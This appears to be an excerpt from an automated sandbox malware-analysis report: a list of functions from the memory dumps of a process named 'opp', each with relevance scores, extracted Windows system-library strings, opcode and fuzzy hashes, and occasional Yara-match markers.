                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfff$q
                                                              • API String ID: 0-4235343039
                                                              • Opcode ID: 5b55deb5c20f3493d2f6e5bbb201a8583f0a931cdd9734aaac72b93e965e3e11
                                                              • Instruction ID: 6a01124ec7287b3bcd9d9aa0051d232d3e8105f2cd27ee99d608a3d3df1815de
                                                              • Opcode Fuzzy Hash: 5b55deb5c20f3493d2f6e5bbb201a8583f0a931cdd9734aaac72b93e965e3e11
                                                              • Instruction Fuzzy Hash: 31414931E0011B47DB1CCE5DCD947AABBA6DBD4348F08817AE809EF3D5E578AE059784
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0169A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0169A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0169A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
                                                              • Instruction ID: e215eda1c13f9ac9ff06619fcd7edce7140ed81f6b1b1f8d4ddbde46112b7379
                                                              • Opcode Fuzzy Hash: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
                                                              • Instruction Fuzzy Hash: F9418B31A04649DBDF118F99CC50B6ABBF9BF84718F1440A9EA00DB395E3B5D901CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
                                                              • Instruction ID: 6f57c84641e6255b632f652371f3b3ef508ab1b84894c7864be05602f91e0041
                                                              • Opcode Fuzzy Hash: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
                                                              • Instruction Fuzzy Hash: AC01DCB2250788AFD321DF64CD46B2677E8EB84B29F00893DB649C7190E334E804CB4A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0169C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 646bc1d98bc4b9da9c3e728e6a6e893ae09cf88d13ff6b6cb612d537f4e0df3a
                                                              • Instruction ID: e6acdec57e2ff9309f2497ab6b64b27836711d64160e60d164f7b569e66f9fbb
                                                              • Opcode Fuzzy Hash: 646bc1d98bc4b9da9c3e728e6a6e893ae09cf88d13ff6b6cb612d537f4e0df3a
                                                              • Instruction Fuzzy Hash: 95825975E002198BEF25CFA9CD80BEDBBB9BF48710F14816AD919AB391D7309942CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016E2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P`vRbv
                                                              • API String ID: 0-2392986850
                                                              • Opcode ID: b396c4637f3863f6d0a7af8e3330e90d32692e3de391c98cdadf8aa496422ce5
                                                              • Instruction ID: a44aa63c1ca3ef00a1bd0adcda7dcae2c5198012d97280c2a2e9169da5bafb14
                                                              • Opcode Fuzzy Hash: b396c4637f3863f6d0a7af8e3330e90d32692e3de391c98cdadf8aa496422ce5
                                                              • Instruction Fuzzy Hash: 5742D071D0625AAAEF29DBACDC4C6FDBBF1BF05310F14821AE541AB381D7358A81CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0173CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                              • Instruction ID: 2e7cbf440fc4ff0792d97912a76523f50a3e5884f97fc117ccc78f4be776db34
                                                              • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                              • Instruction Fuzzy Hash: 88621770D012188FCB98DF9AC4D4AADB7B2FF8C311F64819AE9816B745C7356A16CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016B2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 2586705cd8b55ff27c4472a5c5a4226b3582aa7f6f84a87a189b01dddebf8b62
                                                              • Instruction ID: ba7cb646b736cde7bd22bc779e3c1ac75b15c11254f32b5bf7a111cccbb9afd2
                                                              • Opcode Fuzzy Hash: 2586705cd8b55ff27c4472a5c5a4226b3582aa7f6f84a87a189b01dddebf8b62
                                                              • Instruction Fuzzy Hash: 40F17F71708746CFD725CF28C8D0AAABBE5BF88610F04896DE99987341DB34D985CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00417BEE Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (
                                                              • API String ID: 0-3887548279
                                                              • Opcode ID: b2e471f64ea49096089159f02d754ea0e26c6e54bdec001a45f51cc455e5cf5f
                                                              • Instruction ID: 82481c15a595f8fb28a726124162b197af6e66e03fb384e1ceb7c16fad0ebb89
                                                              • Opcode Fuzzy Hash: b2e471f64ea49096089159f02d754ea0e26c6e54bdec001a45f51cc455e5cf5f
                                                              • Instruction Fuzzy Hash: 5D021CB6E006199FDB54CF9AC8805DDFBF2FF88314F1AC1AAD849A7315D6746A418F80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00417BF3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (
                                                              • API String ID: 0-3887548279
                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                              • Instruction ID: 375a2779a81f12f7500dde7d159f4bde5e3d5390ac70e0f1098be60d318ca80c
                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                              • Instruction Fuzzy Hash: 35021DB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01692FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PATH
                                                              • API String ID: 0-1036084923
                                                              • Opcode ID: 69476c94f7fc52688dc41e24d4bd0492b13412cd6c9086d1c15b0bf7be28f184
                                                              • Instruction ID: d9e4409092a6084ceec1ace8b5838226ee35a1f7e89a626d6d23d7e084380630
                                                              • Opcode Fuzzy Hash: 69476c94f7fc52688dc41e24d4bd0492b13412cd6c9086d1c15b0bf7be28f184
                                                              • Instruction Fuzzy Hash: 12F1AB71E40259ABDF25DFACDC80ABEBBB9FF48710F558029E941AB350D7309841CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID: __aullrem
                                                              • String ID:
                                                              • API String ID: 3758378126-0
                                                              • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                              • Instruction ID: 831c04d95c5898204b951b2220ce83bb323d4040c50ee9423a84a532c84d1c62
                                                              • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                              • Instruction Fuzzy Hash: D1418D71F001199BDF18DFBCC8805AEF7F2FF88320B19827AD615E7285E634A9548B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01690100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 16848eb7a4adbfba3adbf2e6d920b79d99e9657604f8bef8da7cb853593caed5
                                                              • Instruction ID: 3b6d4a192c60a50c0419952b10859fe96f2c831a206386cfbccc33f47c8be385
                                                              • Opcode Fuzzy Hash: 16848eb7a4adbfba3adbf2e6d920b79d99e9657604f8bef8da7cb853593caed5
                                                              • Instruction Fuzzy Hash: 8BA16A71A04229ABDF29CA288D44BFE7BFD5F54304F08419DFE46AB3C1C77189818B54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01744420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 805aaebf6bf1881c0f74b76f187a9f7b878ca099fa83c3b00312401f84c0ea6c
                                                              • Instruction ID: 85f24b7c8577bc5b434c99c061942c5b5f8a93a4748ffcfecbfb0de76e5ea1a5
                                                              • Opcode Fuzzy Hash: 805aaebf6bf1881c0f74b76f187a9f7b878ca099fa83c3b00312401f84c0ea6c
                                                              • Instruction Fuzzy Hash: A8A13831600368ABEF35CA28CC44BFDFBA99F5A714F084498AE475B281D775C941EBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01716420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 0ae6ddc5283042371fd9a6a987b3163f50a11f10332c96c1d8dab02f12e3d1d7
                                                              • Instruction ID: 99c514e6b498341d65a64a2e6fe0893d61d9014735cbc7d3a247978eb79dab08
                                                              • Opcode Fuzzy Hash: 0ae6ddc5283042371fd9a6a987b3163f50a11f10332c96c1d8dab02f12e3d1d7
                                                              • Instruction Fuzzy Hash: AE917471A41219AFEB21DF99CC85FEEBBB9EF14B50F100069F601AB294D774AD40CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0173E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 12070a653813ced6f4970ede5b65196e0db168a9cf34d9b9a94cf1f860865881
                                                              • Instruction ID: 22e10cb33a95689dc2d6d28ac3eda50e252ccae4895dc25277918af7b856f204
                                                              • Opcode Fuzzy Hash: 12070a653813ced6f4970ede5b65196e0db168a9cf34d9b9a94cf1f860865881
                                                              • Instruction Fuzzy Hash: FF919D72901619BEDB22AFA5DC84FEFFB7AEF85740F100029F501A7252EB749941CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: cb7fa9e17b2945500c541e0719a2918986558a34ac69a8e87998cb6d3cb124d1
                                                              • Instruction ID: c7485ab274482b87f0480684f5023679a3f787704a97ebf4403bc4913d701ed8
                                                              • Opcode Fuzzy Hash: cb7fa9e17b2945500c541e0719a2918986558a34ac69a8e87998cb6d3cb124d1
                                                              • Instruction Fuzzy Hash: 33716DB5E0031ADBDF29CF98C9A06ADBBF2BF48710F14816EF505A7281E7319951CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01734978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: 8641760a6529934546ee19808d51ed8b1755c39242d1677a94fc48c8e6961ecf
                                                              • Instruction ID: 7e1fe8e82f5d023a15e5252ff714aec25215a5ab47a39b07ebec5f45e48fafb8
                                                              • Opcode Fuzzy Hash: 8641760a6529934546ee19808d51ed8b1755c39242d1677a94fc48c8e6961ecf
                                                              • Instruction Fuzzy Hash: 4151B572D0022A9BDF18DF99D840AAEFBB9BF44650F05416DE912BB211D3349D02CBE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 36eda19c6d0edf23a0a4efccbcbc7b49f1072f59efc210e64c820fb902067950
                                                              • Instruction ID: a81502238cdc4f675fd56692388ff7a6ac662299510086bbc1964183cd1efcde
                                                              • Opcode Fuzzy Hash: 36eda19c6d0edf23a0a4efccbcbc7b49f1072f59efc210e64c820fb902067950
                                                              • Instruction Fuzzy Hash: 1F41A172508312ABD710DA79CD80B6BBBE9AF88714F84092DFA85D7240E775DD04CBA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0170C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: a89a2e53a9779c3a55b41baa5727377a450232f0cafb4dd3ae6bc9e043c8a664
                                                              • Instruction ID: d8476b6733601dacf805ce9b472d25a00c970d2d8f4325f42fc6e1b9707522cd
                                                              • Opcode Fuzzy Hash: a89a2e53a9779c3a55b41baa5727377a450232f0cafb4dd3ae6bc9e043c8a664
                                                              • Instruction Fuzzy Hash: BE4148B1D4162DEBDB22DA50CC84FDEB77DAB45714F0045E9A708A7180DB709E498F98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01726B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 25642b00a23b59ac94351eaf08f4676d7e20e1c7a56597290f776fb2ca952093
                                                              • Instruction ID: fcf4476592b2f00bafcf701cd71d22c90361e7e8eac96f6bd239fbedcf4ac9ed
                                                              • Opcode Fuzzy Hash: 25642b00a23b59ac94351eaf08f4676d7e20e1c7a56597290f776fb2ca952093
                                                              • Instruction Fuzzy Hash: 68311A31E007699BDB22EB69CC50BAEFBA9DF04704F54406AFD41AB282C775EC46CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0170CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: 9e738dab6f05ead95455da2d533c8db33272acb59ccaa1df48bb56dad9687717
                                                              • Instruction ID: 1f92b5fa85ae3d61aea8cf0fe846ed89b81444d853a9b26f3f6d8be9b61b97d8
                                                              • Opcode Fuzzy Hash: 9e738dab6f05ead95455da2d533c8db33272acb59ccaa1df48bb56dad9687717
                                                              • Instruction Fuzzy Hash: 60310576900A15EFEB17DA58C851E6FFBB5EB80710F0142A9AA01A7290D730DE00EBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0171892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0171895E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: c316a3195a72910c62ff5561a27a92a1f673553034b6a7e3365a5610df43ec6a
                                                              • Instruction ID: c870ebfc722b7303fc1ca0583a9038838c4fefd13b4ea899643450ec9e82c9b9
                                                              • Opcode Fuzzy Hash: c316a3195a72910c62ff5561a27a92a1f673553034b6a7e3365a5610df43ec6a
                                                              • Instruction Fuzzy Hash: 0A012B723442019BE7206F5DCC84A6AFF67EF81A64B14042CF7810A159CF206881C797
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016CE8F0 Relevance: 1.0, Instructions: 985COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e71b12af80ffd9d70f18a7b749a6d0187222945efd52b17d15bcee77d0ffd754
                                                              • Instruction ID: 856c14258125c33c5baa1965b67aba124f27508b3eef9e59cd18d6c35b2f9a10
                                                              • Opcode Fuzzy Hash: e71b12af80ffd9d70f18a7b749a6d0187222945efd52b17d15bcee77d0ffd754
                                                              • Instruction Fuzzy Hash: 1A821372F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016D516C Relevance: .8, Instructions: 785COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b055a6708ee8fc60feca5acc121cea0cc57943b00720c55ea8905f9d11287e98
                                                              • Instruction ID: 2a33947850f246be903dec45ad3b4464dbb26563edb7bb55d16b704c22bd59f0
                                                              • Opcode Fuzzy Hash: b055a6708ee8fc60feca5acc121cea0cc57943b00720c55ea8905f9d11287e98
                                                              • Instruction Fuzzy Hash: 5762AB32D0869AAFCF25CF08DC904AEBB72BE55354B49C258C89B67B04D371BA54CBD1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01732000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01a3154353f73855eb58bfd85d7c3bab180c9c4d6131cf4f5248402fa281fe5c
                                                              • Instruction ID: 07a981f79cdda1011bbc6bf05090e4dd23ac7c4f96512cee0a8b01670d7c7313
                                                              • Opcode Fuzzy Hash: 01a3154353f73855eb58bfd85d7c3bab180c9c4d6131cf4f5248402fa281fe5c
                                                              • Instruction Fuzzy Hash: 4442CF326083419BE725CF68C890A6BFBE6BFC8700F58492DFA8297253D771D945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016E739A Relevance: .7, Instructions: 705COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e8c949e4c4436fc44e5ed8f9ebad757bf7bde0aad5bb558138ebd6b7f99eff4
                                                              • Instruction ID: 2aece3cbabe33176bc51cbe77f8d5b0d3f2026a6ed6f280122083e6a63d6376e
                                                              • Opcode Fuzzy Hash: 5e8c949e4c4436fc44e5ed8f9ebad757bf7bde0aad5bb558138ebd6b7f99eff4
                                                              • Instruction Fuzzy Hash: 0D429D71A016169FDB19CF59C8846AEBBF2FF88314B14866DD952AB340DB30E942CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016BB2C0 Relevance: .6, Instructions: 629COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63f14587a416085b0a6a8c9b317e44a4c918b700d0c58b097bf22b456a9c68a0
                                                              • Instruction ID: 904ceaf19b6afcd5bae55ed0b9daf9e3a656f9fce31e527d525fbc4539894463
                                                              • Opcode Fuzzy Hash: 63f14587a416085b0a6a8c9b317e44a4c918b700d0c58b097bf22b456a9c68a0
                                                              • Instruction Fuzzy Hash: 32329A72E012199BDB24CFA8DC94BEEBBB6FF54714F18002DE905AB391E7359941CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01728158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
                                                              • Instruction ID: eb7ea401c292e5d96abec1ecd89a44649dcca506fe11d6ed7a5c21868e25cef0
                                                              • Opcode Fuzzy Hash: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
                                                              • Instruction Fuzzy Hash: D9425C75E102298FEB24CF69CC81BADFBF6BF48300F148199E949AB242D7359985CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 016A2840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1660000_opp.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 716da21fb7022a68770f50926b5772d03fe8e2cd2613bb9187ee7ba392aa3902
                                                              • Instruction ID: 78231c954e35183cf2df6a6ca231945e1cdee427cae5914b82657034884434df
                                                              • Opcode Fuzzy Hash: 716da21fb7022a68770f50926b5772d03fe8e2cd2613bb9187ee7ba392aa3902
                                                              • Instruction Fuzzy Hash: C232BB70A007568BEB25CF69CC587BEBBF2BF84704F24811DE6969B385D735A842CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

